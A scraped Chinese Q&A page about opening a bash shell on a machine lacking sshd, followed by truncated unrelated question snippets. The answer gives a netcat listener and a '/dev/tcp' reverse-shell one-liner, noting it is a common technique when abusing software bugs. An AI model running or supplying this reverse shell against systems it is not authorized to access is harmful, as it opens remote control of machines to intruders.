程序员经验分享-hwhale

如何在接收端打开没有 SSHD 的 shell?

2024-05-01

我有一台没有 SSHD 的机器,我想从远程机器(我可以完全控制)在这台机器上打开 bash shell。

由于我的有限机器上有 SSH,因此我配置了反向代理:

$ ssh -R 19999:localhost:22 remoteuser@remotemachine

现在,我在端口 19999 上建立了从“完全控制”机器到“受限”机器的连接。我将如何使用此设置打开外壳?


您可以将输入从某个端口直接传送到bash。这是滥用软件中的各种错误时的常见做法。例如,在具有完全访问权限的计算机上运行:

nc -lvp 9999

并且在有限的机器上

/bin/bash -i >& /dev/tcp/192.168.122.1/9999 0>&1

哪里的192.168.122.1是全控机的IP。

这将为您提供第一台机器中第二台机器的外壳。但请注意,连接未加密。如果您想要加密,则需要添加 TCP 转发步骤(与上面的建议类似)。

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

shell

SSH

sshd

如何在接收端打开没有 SSHD 的 shell? 的相关文章

随机推荐

  • 获取表单对象中动态输入元素的值

    我的问题是 如何引用表单中输入元素的动态 名称 例如 使用以下 HTML

  • 如何更改matplotlib注释中的箭头样式?

    我想更改注释中的箭头头 matplotlib 但与其他属性一起使用时不起作用 例如shrink 通过查看参数集 它似乎改变了创建的对象的类型 Example 以下代码显示了两种类型的注释箭头 import matplotlib pyplot

  • 设置 Size 属性时 Winform 不会调整大小

    我有一个用于托管 WebBrowser 控件的 WinForm 我想根据浏览器加载的文档大小动态调整表单大小 我可以从 WebBrowser 控件中成功读取文档大小 并根据该大小设置表单大小 但表单根本不会调整大小 调整大小是在 WebBr

  • ComponentResourceKey 作为 DynamicResource 问题

    我在使用 ComponentResourceKey 时发现一些意外行为 出现问题是因为我使用了 SystemColors 类中使用的名称 考虑以下代码 首先 我将 a 中的 ComponentResourceKey 公开为静态属性 publ

  • 未找到类规范化器(在 PHP 5.3.8 中)

    我在尝试使用时收到此 PHP 错误Normalizer类 特别是Normalizer normalize功能 Fatal error Class Normalizer not found 我目前使用的是 PHP 5 3 8 因此 根据PHP

  • 如何使用云 Firestore 实现 HIPAA 合规性? [关闭]

    Closed 这个问题不符合堆栈溢出指南 help closed questions 目前不接受答案 我必须开发一个健康应用程序 想知道是否可以使用 Cloud Firestore 作为它的后端 任何人都可以对如何使我的系统符合 HIPAA

  • 使用 javaw.exe 启动应用程序时,不会执行关闭挂钩

    如果我使用 javaw exe 启动 Java 应用程序 则当用户从其 Windows 帐户注销时 不会执行关闭挂钩 该应用程序实际上是使用 launch4j 生成的 exe 文件启动的 但我知道它使用 javaw exe 来启动它 这似乎

  • Python 套接字库认为套接字未打开时已打开

    我正在使用一些Python 如下所示 HOST 127 0 0 1 PORT 43434 single socket socket socket AF INET socket SOCK STREAM try single bind HOST

  • WPF 中的自动展开树视图

    有没有办法在 WPF 中自动展开树视图中的所有节点 我搜索了 甚至没有在 treeview 属性中找到展开功能 Thanks 您可以设置 ItemContainerStyle 并使用 IsExpanded 属性

  • Python - 列出文件夹中的文件 - 带变量的路径名

    我对此非常陌生 我正在使用 python 我想列出多个不同文件夹中的文件 使用 Windows 在我的第一次尝试中 我有很多路径变量 每条路径都有自己的变量 它确实有效 但这似乎是一种冗长的做法 由于除了文件夹名称之外 路径均相同 因此我尝

  • 使用包含双引号的字符串填充输入字段

    我从服务器返回一个值 其中包含双引号 我需要用值填充输入标签 我尝试过使用 escape myVariable 但这会将空格转换为 20 等 我想我可以写一个 if then 来表示如果字段中有双引号 则使用 value 但是如果字段中同时

  • 如何访问 Go 中的嵌套模块(子模块)?

    去版本 1 12 9 这是一个简单演示项目的结构 所以我们有一个模块domain 其中包含两个模块 activity and person 我想将域与主文件中的所有嵌套模块一起使用 gt 模块 go 我知道如何导入domain主要在go m

  • SciKit-Learn 的分解模块中未安装 LatentDirichletAllocation

    我在 SciKit Learn 包中遇到了一些奇怪的问题 SciKit Learn 包内有 分解 模块 其中应包含 LatentDirichletAllocation 函数 请参阅此处的文档 https scikit learn org s

  • 根据机会创建销售订单时填充自定义字段

    我在 SO 屏幕 SO301000 上创建了一个自定义字段 联系人 现在 当用户从机会屏幕 CR304000 创建销售订单时 我需要填充这些字段 新的自定义字段联系人基于在机会中选择的客户 我可以看到 当我从机会创建销售订单时 客户会自动填

  • 带 webusb 的指纹扫描仪

    可以将 USB 指纹扫描仪与 webusb 连接 配对 https wicg github io webusb https wicg github io webusb 我有数字角色 U are U 4500 想要使用react js 连接到

  • 使用 Codename One 在 WebView 上实现 WebRTC

    我正在开发一个应用程序 我需要使用 Android 的 WebView 包含 WebRTC 根据这篇文章 https developer chrome com multidevice webview overview https devel

  • 使用 JSON 响应

    执行 ajax 请求后 我从服务器收到以下响应 error false success true 我的ajax代码 ajax url update type post data this serialize success function

  • HashSet 是否与 List 相同但具有唯一性?

    我需要有能力在收藏中拥有独特的物品 我打算使用字典 这样我就可以使用 ContainsKey 方法 但我认为这会很浪费 因为我不会使用键 值对的 Value 属性 我遇到了HashSet

  • 如何使表单仅位于应用程序的最顶层?

    我正在制作 Excel 插件 其中单击菜单项或工具栏按钮 打开表单 我已将窗体的最顶层设置为 true 但它仍然是 Windows XP 的所有应用程序的最顶层 我只需要保持 Microsoft Excel 的最高位置即可 我在 Visua

  • 如何在接收端打开没有 SSHD 的 shell?

    我有一台没有 SSHD 的机器 我想从远程机器 我可以完全控制 在这台机器上打开 bash shell 由于我的有限机器上有 SSH 因此我配置了反向代理 ssh R 19999 localhost 22 remoteuser remote

热门标签